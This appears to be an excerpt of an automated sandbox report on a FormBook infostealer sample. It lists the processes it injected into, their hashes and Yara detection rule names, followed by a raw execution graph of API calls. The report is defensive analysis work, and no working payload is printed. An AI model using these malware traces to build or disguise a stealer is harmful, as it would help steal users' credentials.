                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.9380185277.00000000015B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.9380185277.00000000015B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.9381714381.00000000050A0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.9381714381.00000000050A0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                              Reputation:high
                                                                                                              Has exited:false

                                                                                                              Target ID:3
                                                                                                              Start time:09:33:33
                                                                                                              Start date:05/11/2024
                                                                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                              Imagebase:0xdd0000
                                                                                                              File size:59'904 bytes
                                                                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.8170544463.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.8170544463.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.8170470399.0000000004F90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.8170470399.0000000004F90000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                              Reputation:high
                                                                                                              Has exited:false

                                                                                                              Target ID:4
                                                                                                              Start time:09:33:58
                                                                                                              Start date:05/11/2024
                                                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                              Imagebase:0x7ff793270000
                                                                                                              File size:597'432 bytes
                                                                                                              MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:moderate
                                                                                                              Has exited:true


                                                                                                                Execution Graph

                                                                                                                Execution Coverage:3%
                                                                                                                Dynamic/Decrypted Code Coverage:1.1%
                                                                                                                Signature Coverage:3.3%
                                                                                                                Total number of Nodes:1594
                                                                                                                Total number of Limit Nodes:41
86044 414e31 86043->86044 86045 414e4d 86043->86045 86089 417f23 66 API calls 86044->86089 86048 41486c 100 API calls 86045->86048 86052 414e46 86045->86052 86047 414e36 86090 417ebb 6 API calls 86047->86090 86050 414e59 86048->86050 86062 41e680 86050->86062 86061 414f08 LeaveCriticalSection LeaveCriticalSection 86052->86061 86054 41453a 66 API calls 86055 414e67 86054->86055 86066 41e5b3 86055->86066 86057 414e6d 86057->86052 86058 413a88 66 API calls 86057->86058 86058->86052 86059->85791 86061->85794 86063 41e690 86062->86063 86064 414e61 86062->86064 86063->86064 86065 413a88 66 API calls 86063->86065 86064->86054 86065->86064 86067 41e5bf 86066->86067 86068 41e5c7 86067->86068 86070 41e5e2 86067->86070 86106 417f36 66 API calls 86068->86106 86069 41e5f0 86108 417f36 66 API calls 86069->86108 86070->86069 86075 41e631 86070->86075 86073 41e5cc 86107 417f23 66 API calls 86073->86107 86074 41e5f5 86109 417f23 66 API calls 86074->86109 86078 41ba3b 67 API calls 86075->86078 86080 41e637 86078->86080 86079 41e5fc 86110 417ebb 6 API calls 86079->86110 86082 41e652 86080->86082 86083 41e644 86080->86083 86111 417f23 66 API calls 86082->86111 86091 41e517 86083->86091 86085 41e5d4 86085->86057 86087 41e64c 86112 41e676 LeaveCriticalSection 86087->86112 86089->86047 86113 41b9c4 86091->86113 86093 41e57d 86126 41b93e 67 API calls 86093->86126 86095 41e527 86095->86093 86096 41e55b 86095->86096 86098 41b9c4 66 API calls 86095->86098 86096->86093 86099 41b9c4 66 API calls 86096->86099 86097 41e585 86100 41e5a7 86097->86100 86127 417f49 66 API calls 86097->86127 86101 41e552 86098->86101 86102 41e567 CloseHandle 86099->86102 86100->86087 86104 41b9c4 66 API calls 86101->86104 86102->86093 86105 41e573 GetLastError 86102->86105 86104->86096 86105->86093 86106->86073 86107->86085 86108->86074 86109->86079 86111->86087 86112->86085 86114 41b9d1 86113->86114 86116 41b9e9 86113->86116 86115 417f36 66 API calls 86114->86115 86118 41b9d6 86115->86118 86117 417f36 66 API calls 
86116->86117 86119 41ba2e 86116->86119 86120 41ba17 86117->86120 86121 417f23 66 API calls 86118->86121 86119->86095 86122 417f23 66 API calls 86120->86122 86123 41b9de 86121->86123 86124 41ba1e 86122->86124 86123->86095 86125 417ebb 6 API calls 86124->86125 86125->86119 86126->86097 86127->86100 86129 415126 86128->86129 86130 41516f 86129->86130 86131 415164 86129->86131 86134 41513a 86129->86134 86132 415965 67 API calls 86130->86132 86131->85800 86133 415177 86132->86133 86141 414f10 86133->86141 86157 417f23 66 API calls 86134->86157 86137 415154 86158 417ebb 6 API calls 86137->86158 86142 414f2e 86141->86142 86147 414f4c 86141->86147 86143 414f37 86142->86143 86142->86147 86153 414f8b 86142->86153 86210 417f23 66 API calls 86143->86210 86145 414f3c 86211 417ebb 6 API calls 86145->86211 86159 4151a6 LeaveCriticalSection LeaveCriticalSection 86147->86159 86149 4150a9 86213 417f23 66 API calls 86149->86213 86150 4150d5 86214 417f23 66 API calls 86150->86214 86152 41453a 66 API calls 86152->86153 86153->86147 86153->86149 86153->86150 86153->86152 86160 41ed9e 86153->86160 86190 41e6b1 86153->86190 86212 41ee9b 66 API calls 86153->86212 86157->86137 86159->86131 86161 41edaa 86160->86161 86162 41edb2 86161->86162 86163 41edcd 86161->86163 86284 417f36 66 API calls 86162->86284 86164 41eddb 86163->86164 86170 41ee1c 86163->86170 86286 417f36 66 API calls 86164->86286 86166 41edb7 86285 417f23 66 API calls 86166->86285 86169 41ede0 86287 417f23 66 API calls 86169->86287 86171 41ee29 86170->86171 86172 41ee3d 86170->86172 86289 417f36 66 API calls 86171->86289 86175 41ba3b 67 API calls 86172->86175 86178 41ee43 86175->86178 86176 41ede7 86288 417ebb 6 API calls 86176->86288 86177 41ee2e 86290 417f23 66 API calls 86177->86290 86181 41ee50 86178->86181 86182 41ee66 86178->86182 86180 41edbf 86180->86153 86215 41e7dc 86181->86215 86291 417f23 66 API calls 86182->86291 86186 41ee5e 86293 41ee91 LeaveCriticalSection 86186->86293 86187 41ee6b 86292 417f36 66 API calls 
86187->86292 86191 41e6c1 86190->86191 86196 41e6de 86190->86196 86297 417f23 66 API calls 86191->86297 86193 41e6c6 86298 417ebb 6 API calls 86193->86298 86195 41e713 86198 41453a 66 API calls 86195->86198 86196->86195 86204 41e6d6 86196->86204 86294 423600 86196->86294 86199 41e727 86198->86199 86200 41ed9e 78 API calls 86199->86200 86201 41e72e 86200->86201 86202 41453a 66 API calls 86201->86202 86201->86204 86203 41e751 86202->86203 86203->86204 86205 41453a 66 API calls 86203->86205 86204->86153 86206 41e75d 86205->86206 86206->86204 86207 41453a 66 API calls 86206->86207 86208 41e769 86207->86208 86209 41453a 66 API calls 86208->86209 86209->86204 86210->86145 86212->86153 86213->86145 86214->86145 86216 41e813 86215->86216 86217 41e7f8 86215->86217 86219 41e822 86216->86219 86221 41e849 86216->86221 86218 417f36 66 API calls 86217->86218 86220 41e7fd 86218->86220 86222 417f36 66 API calls 86219->86222 86224 417f23 66 API calls 86220->86224 86223 41e868 86221->86223 86238 41e87c 86221->86238 86225 41e827 86222->86225 86226 417f36 66 API calls 86223->86226 86227 41e805 86224->86227 86229 417f23 66 API calls 86225->86229 86231 41e86d 86226->86231 86227->86186 86228 41e8d4 86230 417f36 66 API calls 86228->86230 86232 41e82e 86229->86232 86234 41e8d9 86230->86234 86235 417f23 66 API calls 86231->86235 86233 417ebb 6 API calls 86232->86233 86233->86227 86236 417f23 66 API calls 86234->86236 86237 41e874 86235->86237 86236->86237 86241 417ebb 6 API calls 86237->86241 86238->86227 86238->86228 86239 41e8b0 86238->86239 86240 41e8f5 86238->86240 86239->86228 86242 41e8bb ReadFile 86239->86242 86244 416fb6 66 API calls 86240->86244 86241->86227 86245 41ed62 GetLastError 86242->86245 86246 41e9e7 86242->86246 86247 41e90b 86244->86247 86248 41ed6f 86245->86248 86252 41ebe8 86245->86252 86246->86245 86253 41e9fb 86246->86253 86249 41e931 86247->86249 86250 41e913 86247->86250 86255 417f23 66 API calls 86248->86255 86254 423462 68 API calls 86249->86254 86251 417f23 66 
API calls 86250->86251 86256 41e918 86251->86256 86257 417f49 66 API calls 86252->86257 86263 41eb6d 86252->86263 86253->86263 86264 41ea17 86253->86264 86267 41ec2d 86253->86267 86258 41e93d 86254->86258 86259 41ed74 86255->86259 86261 417f36 66 API calls 86256->86261 86257->86263 86258->86242 86260 417f36 66 API calls 86259->86260 86260->86263 86261->86227 86262 413a88 66 API calls 86262->86227 86263->86227 86263->86262 86265 41ea7d ReadFile 86264->86265 86274 41eafa 86264->86274 86268 41ea9b GetLastError 86265->86268 86276 41eaa5 86265->86276 86266 41eca5 ReadFile 86269 41ecc4 GetLastError 86266->86269 86277 41ecce 86266->86277 86267->86263 86267->86266 86268->86264 86268->86276 86269->86267 86269->86277 86270 41ebbe MultiByteToWideChar 86270->86263 86271 41ebe2 GetLastError 86270->86271 86271->86252 86272 41eb75 86279 41eb32 86272->86279 86280 41ebac 86272->86280 86273 41eb68 86275 417f23 66 API calls 86273->86275 86274->86263 86274->86272 86274->86273 86274->86279 86275->86263 86276->86264 86281 423462 68 API calls 86276->86281 86277->86267 86278 423462 68 API calls 86277->86278 86278->86277 86279->86270 86282 423462 68 API calls 86280->86282 86281->86276 86283 41ebbb 86282->86283 86283->86270 86284->86166 86285->86180 86286->86169 86287->86176 86289->86177 86290->86176 86291->86187 86292->86186 86293->86180 86295 416fb6 66 API calls 86294->86295 86296 423615 86295->86296 86296->86195 86297->86193 86302 414cef GetSystemTimeAsFileTime 86299->86302 86301 4431ef 86301->85803 86302->86301 86303->85811 86305->85815 86307 4523e1 86306->86307 86308 4151b0 80 API calls 86307->86308 86309 44afdc GetSystemTimeAsFileTime 86307->86309 86310 452553 86307->86310 86311 41557c 104 API calls 86307->86311 86308->86307 86309->86307 86310->85725 86310->85726 86311->86307 86313 44b1b4 86312->86313 86314 44b1a6 86312->86314 86316 44b1ca 86313->86316 86317 414e06 137 API calls 86313->86317 86318 44b1c2 86313->86318 86315 414e06 137 API calls 86314->86315 86315->86313 86347 4352d1 80 
API calls 86316->86347 86319 44b2c1 86317->86319 86318->85752 86319->86316 86322 44b2cf 86319->86322 86321 44b20d 86323 44b211 86321->86323 86324 44b23b 86321->86324 86325 44b2dc 86322->86325 86327 414e94 105 API calls 86322->86327 86326 44b21e 86323->86326 86329 414e94 105 API calls 86323->86329 86348 43526e 86324->86348 86325->85752 86331 414e94 105 API calls 86326->86331 86334 44b22e 86326->86334 86327->86325 86329->86326 86330 44b242 86332 44b270 86330->86332 86335 44b248 86330->86335 86331->86334 86358 44b0af 110 API calls 86332->86358 86334->85752 86336 44b255 86335->86336 86339 414e94 105 API calls 86335->86339 86337 44b265 86336->86337 86340 414e94 105 API calls 86336->86340 86337->85752 86338 44b276 86359 43522c 66 API calls 86338->86359 86339->86336 86340->86337 86342 44b27c 86343 44b289 86342->86343 86344 414e94 105 API calls 86342->86344 86345 44b299 86343->86345 86346 414e94 105 API calls 86343->86346 86344->86343 86345->85752 86346->86345 86347->86321 86349 4138ba 66 API calls 86348->86349 86350 43527d 86349->86350 86351 4138ba 66 API calls 86350->86351 86352 43528d 86351->86352 86353 4138ba 66 API calls 86352->86353 86354 43529d 86353->86354 86356 4352bc 86354->86356 86360 43522c 66 API calls 86354->86360 86356->86330 86357 4352c8 86357->86330 86358->86338 86359->86342 86360->86357 86361->85633 86363 410148 SHGetDesktopFolder 86362->86363 86366 4101a3 86362->86366 86364 41015a 86363->86364 86363->86366 86365 41018a SHGetPathFromIDListW 86364->86365 86364->86366 86365->86366 86366->85637 86367->85639 86369 40f5e0 151 API calls 86368->86369 86370 40f417 86369->86370 86371 42ca37 86370->86371 86373 40f42c 86370->86373 86374 42ca1f 86370->86374 86372 452574 139 API calls 86371->86372 86376 42ca50 86372->86376 86413 4037e0 138 API calls 86373->86413 86414 43717f 109 API calls 86374->86414 86379 42ca76 86376->86379 86380 42ca54 86376->86380 86378 42ca2d 86378->86371 86383 41171a 74 API calls 86379->86383 86382 434fe1 105 API calls 86380->86382 86381 40f446 
86381->85636 86384 42ca5e 86382->86384 86398 42cacc 86383->86398 86415 43717f 109 API calls 86384->86415 86386 42ccc3 86388 413a88 66 API calls 86386->86388 86387 42ca6c 86387->86379 86389 42cccd 86388->86389 86390 434fe1 105 API calls 86389->86390 86391 42ccda 86390->86391 86395 401b70 74 API calls 86395->86398 86398->86386 86398->86395 86399 402cc0 86398->86399 86407 4026a0 86398->86407 86416 445051 74 API calls 86398->86416 86417 44c80c 86 API calls 86398->86417 86418 44b408 74 API calls 86398->86418 86400 402d71 86399->86400 86403 402cd2 86399->86403 86402 41171a 74 API calls 86400->86402 86401 41171a 74 API calls 86404 402cd9 86401->86404 86402->86403 86403->86401 86405 402cff 86404->86405 86406 41171a 74 API calls 86404->86406 86405->86398 86406->86405 86408 4026af 86407->86408 86410 40276b 86407->86410 86409 41171a 74 API calls 86408->86409 86408->86410 86411 4026ee 86408->86411 86409->86411 86410->86398 86411->86410 86412 41171a 74 API calls 86411->86412 86412->86411 86413->86381 86414->86378 86415->86387 86416->86398 86417->86398 86418->86398 86419->85646 86420->85647 86421 431914 86422 431920 86421->86422 86423 431928 86422->86423 86424 43193d 86422->86424 86685 45e62e 115 API calls 86423->86685 86686 47f2b4 173 API calls 86424->86686 86427 43194a 86435 4095b0 86427->86435 86687 45e62e 115 API calls 86427->86687 86429 409708 86431 4097af 86431->86429 86672 40d590 VariantClear 86431->86672 86433 4315b8 WaitForSingleObject 86433->86435 86436 4315d6 GetExitCodeProcess CloseHandle 86433->86436 86434 431623 Sleep 86438 43163b timeGetTime 86434->86438 86454 409894 86434->86454 86435->86429 86435->86431 86435->86433 86435->86434 86441 40986e Sleep 86435->86441 86445 4098f1 TranslateMessage DispatchMessageW 86435->86445 86435->86454 86458 45e62e 115 API calls 86435->86458 86463 4319c9 VariantClear 86435->86463 86465 4092c0 VariantClear 86435->86465 86467 40b380 86435->86467 86491 409340 86435->86491 86524 409030 86435->86524 86538 40d300 86435->86538 86543 40d320 
86435->86543 86549 409a40 86435->86549 86688 40e380 VariantClear 86435->86688 86676 40d590 VariantClear 86436->86676 86438->86454 86444 409880 timeGetTime 86441->86444 86441->86454 86444->86454 86445->86435 86446 431673 CloseHandle 86446->86454 86447 43170c GetExitCodeProcess CloseHandle 86447->86454 86449 46e641 133 API calls 86449->86454 86451 46dd22 132 API calls 86451->86454 86453 431781 Sleep 86453->86435 86454->86435 86454->86446 86454->86447 86454->86449 86454->86451 86454->86453 86457 40d590 VariantClear 86454->86457 86464 4092c0 VariantClear 86454->86464 86673 447e59 74 API calls 86454->86673 86674 453b07 76 API calls 86454->86674 86675 4646a2 75 API calls 86454->86675 86677 444233 87 API calls 86454->86677 86678 457509 VariantClear 86454->86678 86679 404120 86454->86679 86683 4717e3 VariantClear 86454->86683 86684 436272 6 API calls 86454->86684 86457->86454 86458->86435 86463->86435 86464->86454 86465->86435 86468 40b3a5 86467->86468 86469 40b53d 86467->86469 86470 430a99 86468->86470 86476 40b3b6 86468->86476 86689 45e62e 115 API calls 86469->86689 86690 45e62e 115 API calls 86470->86690 86473 430aae 86478 4092c0 VariantClear 86473->86478 86474 40b528 86474->86435 86476->86473 86479 40b3f2 86476->86479 86490 40b4fd 86476->86490 86477 430dc9 86477->86477 86478->86474 86480 40b429 86479->86480 86482 430ae9 VariantClear 86479->86482 86483 40b476 86479->86483 86489 40b43b 86480->86489 86691 40e380 VariantClear 86480->86691 86481 40b4eb 86481->86490 86692 40e380 VariantClear 86481->86692 86482->86489 86483->86481 86484 430d08 86483->86484 86485 430d41 VariantClear 86484->86485 86484->86490 86485->86490 86487 41171a 74 API calls 86487->86483 86489->86483 86489->86487 86490->86474 86693 45e62e 115 API calls 86490->86693 86492 409386 86491->86492 86494 409395 86491->86494 86694 4042f0 74 API calls 86492->86694 86496 42fba9 86494->86496 86498 42fc07 86494->86498 86500 42fc85 86494->86500 86502 42fcd8 86494->86502 86504 42fd4f 86494->86504 86508 42fd39 
86494->86508 86512 40946f 86494->86512 86514 40947b 86494->86514 86516 4094c1 86494->86516 86519 4092c0 VariantClear 86494->86519 86523 409484 86494->86523 86697 453155 74 API calls 86494->86697 86699 40c620 117 API calls 86494->86699 86701 45e62e 115 API calls 86494->86701 86698 45e62e 115 API calls 86496->86698 86700 45e62e 115 API calls 86498->86700 86702 4781ae 139 API calls 86500->86702 86704 47f2b4 173 API calls 86502->86704 86506 4092c0 VariantClear 86504->86506 86506->86523 86507 42fc9c 86507->86523 86703 45e62e 115 API calls 86507->86703 86706 45e62e 115 API calls 86508->86706 86510 42fce9 86510->86523 86705 45e62e 115 API calls 86510->86705 86695 409210 VariantClear 86512->86695 86518 4092c0 VariantClear 86514->86518 86516->86523 86696 404260 75 API calls 86516->86696 86518->86523 86519->86494 86521 4094e1 86522 4092c0 VariantClear 86521->86522 86522->86523 86523->86435 86707 409110 116 API calls 86524->86707 86526 42ceb6 86717 410ae0 VariantClear 86526->86717 86528 40906e 86528->86526 86530 42cea9 86528->86530 86532 4090a4 86528->86532 86529 42cebf 86716 45e62e 115 API calls 86530->86716 86708 404160 86532->86708 86535 4090f0 86535->86435 86536 4092c0 VariantClear 86537 4090be 86536->86537 86537->86535 86537->86536 86540 4292e3 86538->86540 86542 40d30c 86538->86542 86539 429323 86539->86435 86540->86539 86541 4292fd TranslateAcceleratorW 86540->86541 86541->86542 86542->86435 86544 4296d0 86543->86544 86547 40d32f 86543->86547 86544->86435 86545 42972a IsDialogMessageW 86546 40d33c 86545->86546 86545->86547 86546->86435 86547->86545 86547->86546 86852 4340ec GetClassLongW 86547->86852 86550 409a66 86549->86550 86551 41171a 74 API calls 86550->86551 86610 40aade 86550->86610 86552 409a9c 86551->86552 86554 41171a 74 API calls 86552->86554 86556 409abd 86554->86556 86555 42cee9 86557 41171a 74 API calls 86555->86557 86558 409aeb CharUpperBuffW 86556->86558 86560 409b09 86556->86560 86556->86610 86599 42cf10 86557->86599 86558->86560 86602 409b88 
86560->86602 86855 47d10e 149 API calls 86560->86855 86562 4092c0 VariantClear 86563 42e5e0 86562->86563 86887 410ae0 VariantClear 86563->86887 86565 42e5f2 86566 409e4a 86569 41171a 74 API calls 86566->86569 86573 409ea4 86566->86573 86566->86599 86567 40aa5b 86570 41171a 74 API calls 86567->86570 86568 41171a 74 API calls 86568->86602 86569->86573 86586 40aa81 86570->86586 86572 409ed0 86576 42d50d 86572->86576 86638 409ef8 86572->86638 86865 40b800 VariantClear VariantClear 86572->86865 86573->86572 86574 41171a 74 API calls 86573->86574 86575 42d480 86574->86575 86578 42d491 86575->86578 86861 44b3f6 74 API calls 86575->86861 86580 42d527 86576->86580 86866 40b800 VariantClear VariantClear 86576->86866 86577 42d195 VariantClear 86577->86602 86862 40df50 74 API calls 86578->86862 86580->86638 86867 40e2e0 VariantClear 86580->86867 86581 40a3a7 86583 40a415 86581->86583 86632 42db5c 86581->86632 86590 41171a 74 API calls 86583->86590 86584 4092c0 VariantClear 86584->86602 86593 41171a 74 API calls 86586->86593 86607 40a41c 86590->86607 86593->86610 86594 42d4a6 86863 4530b3 74 API calls 86594->86863 86596 42db96 86873 45e62e 115 API calls 86596->86873 86598 42d128 86601 4092c0 VariantClear 86598->86601 86886 45e62e 115 API calls 86599->86886 86600 42d4d7 86864 4530b3 74 API calls 86600->86864 86606 42d131 86601->86606 86602->86566 86602->86567 86602->86568 86602->86577 86602->86584 86602->86586 86602->86598 86602->86599 86603 42d20c 86602->86603 86612 42dbb9 86602->86612 86856 40c3e0 74 API calls 86602->86856 86857 40c620 117 API calls 86602->86857 86859 40be00 74 API calls 86602->86859 86860 40e380 VariantClear 86602->86860 86603->86435 86858 410ae0 VariantClear 86606->86858 86618 40a481 86607->86618 86874 40c8a0 VariantClear 86607->86874 86854 401380 74 API calls 86610->86854 86612->86562 86614 402cc0 74 API calls 86614->86638 86615 4092c0 VariantClear 86647 40a534 86615->86647 86616 41171a 74 API calls 86616->86638 86617 411421 73 API calls 86617->86638 86619 
40a4ed 86618->86619 86620 42dc1e VariantClear 86618->86620 86618->86647 86625 40a4ff 86619->86625 86875 40e380 VariantClear 86619->86875 86620->86625 86624 41171a 74 API calls 86624->86647 86625->86624 86625->86647 86628 44b3f6 74 API calls 86628->86638 86629 42deb6 VariantClear 86629->86647 86630 40a73c 86633 42e237 86630->86633 86640 40a76b 86630->86640 86631 40e380 VariantClear 86631->86647 86872 4721e5 VariantClear 86632->86872 86879 46e709 VariantClear VariantClear 86633->86879 86634 42dfe9 VariantClear 86634->86647 86635 42df47 VariantClear 86635->86647 86636 40a7a2 86650 40a7ad 86636->86650 86880 40b800 VariantClear VariantClear 86636->86880 86638->86581 86638->86596 86638->86610 86638->86614 86638->86616 86638->86617 86638->86628 86638->86632 86639 40a053 86638->86639 86868 45ee98 74 API calls 86638->86868 86869 4019e0 75 API calls 86638->86869 86870 404260 75 API calls 86638->86870 86871 409210 VariantClear 86638->86871 86639->86435 86640->86636 86662 40a800 86640->86662 86853 40b800 VariantClear VariantClear 86640->86853 86643 41171a 74 API calls 86643->86647 86644 41171a 74 API calls 86649 42dd10 VariantInit VariantCopy 86644->86649 86645 40a8b0 86656 40a8c2 86645->86656 86882 40e380 VariantClear 86645->86882 86646 42e312 86648 42e337 VariantClear 86646->86648 86646->86656 86647->86615 86647->86629 86647->86630 86647->86631 86647->86633 86647->86634 86647->86635 86647->86643 86647->86644 86876 46e9cd 74 API calls 86647->86876 86877 409210 VariantClear 86647->86877 86878 44cc6c VariantClear 86647->86878 86648->86656 86649->86647 86652 42dd30 VariantClear 86649->86652 86651 40a7ee 86650->86651 86658 42e2a7 VariantClear 86650->86658 86650->86662 86651->86662 86881 40e380 VariantClear 86651->86881 86652->86647 86653 42e3b2 86659 42e3da VariantClear 86653->86659 86663 40a91a 86653->86663 86656->86653 86657 40a908 86656->86657 86657->86663 86883 40e380 VariantClear 86657->86883 86658->86662 86659->86663 86660 42e47f 86666 42e4a3 VariantClear 86660->86666 86671 
40a957 86660->86671 86662->86645 86662->86646 86663->86660 86665 40a945 86663->86665 86665->86671 86884 40e380 VariantClear 86665->86884 86666->86671 86668 40aa22 86668->86435 86669 42e559 VariantClear 86669->86671 86671->86668 86671->86669 86885 40e380 VariantClear 86671->86885 86672->86429 86673->86454 86674->86454 86675->86454 86676->86454 86677->86454 86678->86454 86680 40412e 86679->86680 86681 4092c0 VariantClear 86680->86681 86682 404138 86681->86682 86682->86453 86683->86454 86684->86454 86685->86435 86686->86427 86687->86435 86688->86435 86689->86470 86690->86473 86691->86489 86692->86490 86693->86477 86694->86494 86695->86514 86696->86521 86697->86494 86698->86523 86699->86494 86700->86523 86701->86494 86702->86507 86703->86523 86704->86510 86705->86523 86706->86504 86707->86528 86709 4092c0 VariantClear 86708->86709 86710 40416e 86709->86710 86711 404120 VariantClear 86710->86711 86712 40419b 86711->86712 86718 4734b7 86712->86718 86762 40efe0 86712->86762 86713 4041c6 86713->86526 86713->86537 86716->86526 86717->86529 86719 453063 110 API calls 86718->86719 86720 4734d7 86719->86720 86721 473545 86720->86721 86722 47350c 86720->86722 86770 463c42 86721->86770 86723 4092c0 VariantClear 86722->86723 86730 473514 86723->86730 86725 473558 86726 47355c 86725->86726 86743 473595 86725->86743 86727 4092c0 VariantClear 86726->86727 86736 473564 86727->86736 86728 473616 86783 463d7e 86728->86783 86730->86713 86731 473622 86733 473697 86731->86733 86734 47362c 86731->86734 86732 453063 110 API calls 86732->86743 86817 457838 86733->86817 86737 4092c0 VariantClear 86734->86737 86736->86713 86740 473634 86737->86740 86740->86713 86742 473655 86745 4092c0 VariantClear 86742->86745 86743->86728 86743->86732 86743->86742 86829 462f5a 86 API calls 86743->86829 86755 47365d 86745->86755 86746 4736b0 86830 45e62e 115 API calls 86746->86830 86747 4736c9 86831 40e7e0 75 API calls 86747->86831 86750 4736ba GetCurrentProcess TerminateProcess 86750->86747 86751 4736db 
86758 4736ff 86751->86758 86832 40d030 75 API calls 86751->86832 86752 473731 86759 473744 FreeLibrary 86752->86759 86760 47374b 86752->86760 86754 4736f1 86833 46b945 133 API calls 86754->86833 86755->86713 86758->86752 86834 40d030 75 API calls 86758->86834 86835 46b945 133 API calls 86758->86835 86759->86760 86760->86713 86763 40eff5 CreateFileW 86762->86763 86764 4299bf 86762->86764 86766 40f017 86763->86766 86765 4299c4 CreateFileW 86764->86765 86764->86766 86765->86766 86767 4299ea 86765->86767 86766->86713 86851 40e0d0 SetFilePointerEx SetFilePointerEx 86767->86851 86769 4299f5 86769->86766 86836 45335b 75 API calls 86770->86836 86772 463c5d 86837 442c52 79 API calls 86772->86837 86774 463c72 86776 40c060 74 API calls 86774->86776 86782 463cac 86774->86782 86777 463c8e 86776->86777 86838 4608ce 74 API calls 86777->86838 86779 463ca4 86780 40c740 74 API calls 86779->86780 86780->86782 86781 463cf7 86781->86725 86782->86781 86839 462f5a 86 API calls 86782->86839 86784 453063 110 API calls 86783->86784 86785 463d99 86784->86785 86786 463de0 86785->86786 86787 463dca 86785->86787 86841 40c760 77 API calls 86786->86841 86840 453081 110 API calls 86787->86840 86790 463dd0 LoadLibraryW 86799 463e09 86790->86799 86791 463de7 86810 463e19 86791->86810 86842 40c760 77 API calls 86791->86842 86793 463dfb 86793->86810 86843 40c760 77 API calls 86793->86843 86794 463e3e 86795 463e4e 86794->86795 86796 463e7b 86794->86796 86844 40d500 74 API calls 86795->86844 86846 40c760 77 API calls 86796->86846 86799->86794 86799->86810 86801 463e57 86845 45efe7 76 API calls 86801->86845 86802 463e82 GetProcAddress 86805 463e90 86802->86805 86804 463e62 GetProcAddress 86807 463e79 86804->86807 86806 463edf 86805->86806 86805->86807 86805->86810 86806->86810 86811 463eef FreeLibrary 86806->86811 86807->86805 86847 403470 74 API calls 86807->86847 86809 463eb4 86848 40d500 74 API calls 86809->86848 86810->86731 86811->86810 86813 463ebd 86849 45efe7 76 API calls 86813->86849 86815 
463ec8 GetProcAddress 86850 401330 86815->86850 86818 457a4c 86817->86818 86824 45785f 86817->86824 86825 410d40 86818->86825 86819 40c760 77 API calls 86819->86824 86820 453081 110 API calls 86820->86824 86821 443576 77 API calls 86821->86824 86822 4138ba 66 API calls 86822->86824 86823 40f580 76 API calls 86823->86824 86824->86818 86824->86819 86824->86820 86824->86821 86824->86822 86824->86823 86826 410d55 86825->86826 86827 410ded VirtualProtect 86826->86827 86828 410dbb 86826->86828 86827->86828 86828->86746 86828->86747 86829->86743 86830->86750 86831->86751 86832->86754 86833->86758 86834->86758 86835->86758 86836->86772 86837->86774 86838->86779 86839->86781 86840->86790 86841->86791 86842->86793 86843->86799 86844->86801 86845->86804 86846->86802 86847->86809 86848->86813 86849->86815 86850->86806 86851->86769 86852->86547 86853->86636 86854->86555 86855->86560 86856->86602 86857->86602 86858->86668 86859->86602 86860->86602 86861->86578 86862->86594 86863->86600 86864->86572 86865->86576 86866->86580 86867->86638 86868->86638 86869->86638 86870->86638 86871->86638 86872->86596 86873->86612 86874->86607 86875->86625 86876->86647 86877->86647 86878->86647 86879->86636 86880->86650 86881->86662 86882->86656 86883->86663 86884->86671 86885->86671 86886->86612 86887->86565 86888 42919b 86893 40ef10 86888->86893 86891 411421 73 API calls 86892 4291aa 86891->86892 86894 41171a 74 API calls 86893->86894 86895 40ef17 86894->86895 86896 42ad48 86895->86896 86901 40ef40 73 API calls 86895->86901 86898 40ef2a 86902 40e470 86898->86902 86901->86898 86903 40c060 74 API calls 86902->86903 86904 40e483 GetVersionExW 86903->86904 86905 4021e0 74 API calls 86904->86905 86906 40e4bb 86905->86906 86928 40e600 86906->86928 86913 42accc 86914 42ad28 GetSystemInfo 86913->86914 86918 42ad38 GetSystemInfo 86914->86918 86915 40e557 GetCurrentProcess 86948 40ee30 LoadLibraryA GetProcAddress 86915->86948 86916 40e56c 86916->86918 86941 40eee0 86916->86941 86921 40e5c9 86945 40eea0 
